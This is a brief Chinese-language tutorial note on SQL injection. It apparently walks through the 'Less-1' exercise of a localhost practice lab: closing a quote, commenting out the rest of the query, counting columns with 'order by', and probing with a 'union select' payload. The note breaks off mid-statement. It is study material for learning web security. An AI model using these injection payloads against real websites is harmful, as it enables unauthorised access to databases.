1.方法
url:http://localhost/index.php?id=1
查询数据库当前表中id等于1的
url:http://localhost/index.php?name=admin
查询当前数据库表中带有name等于admin
url:http://localhost/index.php?type=database
查询当前数据库表中带有database的类型的文章
select * from user where id=1 整数型
select id,name,type from user where type='database' 字符型
2.
url:http://localhost/Less-1/index.php?id=1
猜想:select * from user where id=1
返回:1' LIMIT 0,1
确定执行在' 注释 之间
url:http://localhost/Less-1/index.php?id=1' -- 111
url:localhost/Less-1/index.php?id=1' order by 3 -- 111 判断字段长度
url:http://localhost/Less-1/index.php?id=1%27%20union%20select%201,2,3%20--%20111
select * from user where id='1' uni